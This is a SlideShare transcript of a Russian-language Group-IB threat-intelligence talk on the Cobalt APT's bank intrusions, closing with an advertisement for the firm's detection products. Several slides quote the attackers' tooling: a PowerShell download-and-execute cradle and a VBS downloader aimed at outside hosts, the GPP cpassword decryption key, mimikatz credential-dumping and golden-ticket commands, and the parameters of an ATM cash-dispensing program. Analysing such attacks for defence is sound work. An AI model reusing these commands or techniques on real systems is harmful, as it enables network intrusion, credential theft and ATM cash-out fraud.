Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Жизнь богаче схем ( APT Cobalt на кончиках пальцев). Сергей Золотухин, Group-IB

631 views

Published on

Жизнь богаче схем ( APT Cobalt на кончиках пальцев). Сергей Золотухин, Group-IB

Published in: Economy & Finance
  • Be the first to comment

  • Be the first to like this

Жизнь богаче схем ( APT Cobalt на кончиках пальцев). Сергей Золотухин, Group-IB

  1. 1. 1 Жизнь богаче схем ( APT Cobalt на кончиках пальцев) Докладчик: Сергей Золотухин Менеджер по развитию бизнеса Group-IB
  2. 2. GROUP-IB.COM Временная шкала целевых атак *Cobalt was detected in June 2
  3. 3. 3 Почему невозможно быть полностью защищенным ТЫСЯЧИ СОТРУДНИКОВ Не все сотрудники эксперты по безопасности. Им надо получать и открывать письма от коллег, руководства и т.д. для выполнения своих служебных обязанностей Атакующие могут звонить прежде чем отправить письмо, воспользоваться взломанной почтой коллег Многие просто покупают решения по безопасности и чувствуют себя защищёнными, перекладывая ответственность на вендора. Нет процедуры реагирования на инцидент УМНЫЙ ФИШИНГ СТАРАЯ ПАРАДИГМА 10 минут время необходимое для получения полного контроля над сетью
  4. 4. 4 Шаблон атак легко копировать 1 Целевой фишинг, покупка загрузок, уязвимость во внешней системе Собирают реквизиты доступа к центральным серверам и пароли администраторов использую открытую утилиту Mimikatz НАЧАЛЬНОЕ ПРОНИКНОВЕНИЕ 2 УДАЛЕННЫЙ ДОСТУП 3 ПОЛУЧЕНИЕ ПРИВИЛЕГИЙ 6 ПРОТИВОДЕЙСТВИЕ РАССЛЕДОВАНИЮ Атакующие используют удаленный доступ для более глубокого проникновения в сети Атакующие ищут компьютеры с которых можно получить доступ к критичным системам (АРМ КБР, SWIFT, карточный процессинг, системы управления банкоматами) Получают доступ к системам, как легитимный оператор, наблюдают за ним и выполняют те же действия Уничтожают данные после атаки и компьютеры 5 ЗАВЕРШЕНИЕ АТАКИ4 СБОР ДАННЫХ
  5. 5. 5 Фишинг
  6. 6. 6 Закрепление на локальной системе ЭКСПЛОЙТ, EXE, VBS-СКРИПТ Троян в зашифрованном архиве CVE-2015-1641 VBS скрипт Вредоносный модуль загружается и храниться только в оперативной памяти Получение списка легитимного ПО в автозагрузке и замена исполняемых файлов: • iusb3mon. exe (Intel(R) USB 3.0 eXtensible Host Controller) • jusched.exe (Sun Java Update Scheduler) Либо создания задач в Windows Scheduler ОПЕРАТИВНАЯ ПАМЯТЬ АВТОЗАГРУЗКА И ЛЕГАЛЬНОЕ ПО PowerShell скрипт: «C:Windowssystem32cmd.exe - powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://84.200.84.241:800/arp'))» VBS скрипт: var u = 'https://filebin.net/1xpzydyqftzdm48k/cmd.exe'.split(',');for(i = 0; i < u.length; i++){try{var h = new ActiveXObject('msxml2.xmlhttp');h.open('GET', u[i], false);h.send();if(h.status == 200 && h.responsetext.substr(0, 2) == 'MZ')
  7. 7. 7 Повышение привилегий ОШИБКА КОНФИГУРАЦИИ КОНТРОЛЛЕРА ДОМЕНА • Использование Group Policy Preferences (GPP) • «[server_name]sysvol[domain_name]Policies[group_policy_na me]MachinePreferencesGroupsGroups.xml» • Из файла Groups.xml они извлекают логин и пароль администратора домена из полей cpassword и userName. (пароль в зашифрованном с помощью AES-256 алгоритме и закодированном по Base64) • Для получения пароля в открытом виде атакующие декодируют пароль по Base64 • Полученный зашифрованный пароль расшифровывается с помощью ключа 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a43 3b66c1b
  8. 8. 8 Повышение привилегий УТИЛИТА MIMIKATZ Есть доступ к DC mimikatz sekurlsa::logonpasswords Нет доступа к DC, но есть LA Подключение к рабочим станциям и серверам с целью поиска учетной записи с доступом к DC Нет прав LA и нет доступа к DC CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 и CVE-2015-2426, которые позволяли поднять привилегии до уровня SYSTEM на x32 и x64. Если на локальной системе не работает, то подключается к другим хостам пока не найдет уязвимый Золотой билет • "privilege::debug" "lsadump::samrpc /patch" exit • извлечение NTLM-хеш учетной записи krbtgt (Key Distribution Center Service Account) • создают файл с золотым TGT билетом
  9. 9. 9 Поиск нужных систем с доступом к банкоматной сети netscan.exe – сетевой сканнер NetScan patch86.exe – патчинг Termsrv для поддержки одновременных терминальных сессий plink.exe – консольный ssh клиент для Windows psexec.exe – консольная утили для удаленного управления на Windows
  10. 10. 10 Удаленный доступ • Легальный удаленный доступ • HideVNC • TeamViewer • AmmyAdmin
  11. 11. 11 Программы для банкоматов ServiceLogicalName - имя сервиса, используемое в качестве аргумента для функции WFSOpen (например «Cash Dispenser Module»). Cassettes Count - общее число кассет, присутствующих на устройстве. Значение должно быть в интервале от 1 до 15. Cassette Number - номер кассеты, из которой следует выдать наличность. Значение должно быть в интервале от 1 до 15. Banknotes Count - число банкнот, которое необходимо выдать из кассеты. Значение должно быть в интервале от 1 до 60. Dispenses Count - означает какое количество раз необходимо повторить выдачу наличности. Значение должно быть в интервале от 1 до 60. Программа, использует стандартные функции по интерфейсу XFS через XFS Manager (eXtensions for Financial Services).
  12. 12. 12 Завершение атаки
  13. 13. 13 Система выявления ранее неизвестного вредоносного кода с использованием передовых алгоритмов машинного обучения Скачиваемые файлы Объекты, скачиваемые пользователями и их компьютерами при атаке их браузеров и другие ранее неизвестные вредоносные объекты, не определяемые антивирусами и сигнатурным подходом. Круглосуточная поддержка вашей службы безопасности и сопровождение процесса реагирования опытными специалистами Group-IB Полная конфиденциальность – обработка и анализ файлов внутри вашего контура безопасности Почтовые вложения Вредоносные файлы, получаемые пользователями через почтовую систему в ходе целевых атак и применения социальной инженерии Целевые атаки Вредоносное ПО, нацеленное эксклюзивно на вашу инфраструктуру
  14. 14. 1 4 Сенсор анализа трафика SOC GROUP-IB Сведения об инцидентах, полученные от сенсора, классифицируются и коррелируются в Центре обработки данных. События анализируются квалифицированными специалистами Group-IB вручную. Эксперты SOC уведомят ваших специалистов о критичных угрозах по телефону и e-mail, а все результаты анализа будут доступны в удобном web-интерфейсе. Опытные специалисты Group-IB берут на себя работу по выявлению критичных инцидентов, позволяя вашей службе ИБ сосредоточиться на реагировании. выявляет зараженные узлы, устанавливая их взаимодействия с командными центрами по признакамвредоносной активности, разрабатываемым на основе данных из уникальных источников. детектирует сетевые аномалии, генерируемые вредоносными программами, при помощи алгоритмов машинного обучения. интегрируется с системой поведенческого анализа Polygon для выявления ранее неизвестного вредоносного кода. передает информацию о выявленных инцидентах в SOC Group-IB по безопасному каналу либо в любую внутреннюю корпоративную систему учета событий ИБ. Анализ данных ведется круглосуточно, без выходных Как работает TDS
  15. 15. Как выглядит Cobalt при запуске файла на TDS Polygon
  16. 16. Результат проверки на TDS Polygon: оценка вредоносности
  17. 17. Поведенческие маркеры - Вредоносные
  18. 18. Поведенческие маркеры - Прочие
  19. 19. Дерево процессов
  20. 20. Уведомление о критичном инциденте
  21. 21. Результат проверки на TDS Polygon: связанные события
  22. 22. Рассылка Cobalt 10 марта 2017г Первая волна 10.03.2017, 12:57, Банк 1 Вторая волна 10.03.2017, 15:12, Банк 2 Адрес: media@ecb-europe.com
  23. 23. 23 Что делать, чтобы предотвратить APT атаку КИБЕРРАЗВЕДКА ОБНАРУЖЕНИЕ РЕАГИРОВАНИЕ Отслеживайте появление новых методов и инструментов атак Используйте специальные системы обнаружения целевых атак При обнаружении следов атаки вызывайте команду профессиональных криминалистов Присылайте подозрительные файлы для анализа – intelligence@group- ib.ru АНАЛИЗ Анализируйте подозрительные файлы в изолированной среде Запишитесь на бесплатный тест-драйв комплекса TDS + Polygon - www.group-ib.ru/tds.html ЦЕНТР РЕАГИРОВАНИЯ CERT-GIB Круглосуточная помощь опытных специалистов в реагировании на инциденты РАССЛЕДОВАНИЯ И КРИМИНАЛИСТИКА Безупречный сбор доказательной базы и оперативное установление личностей преступников
  24. 24. facebook.com/group-ib info@group-ib.ruwww.group-ib.ru twitter.com/groupib +7 495 984 33 64blog.group-ib.ru Предотвращаем и расследуем киберпреступления с 2003 года.

×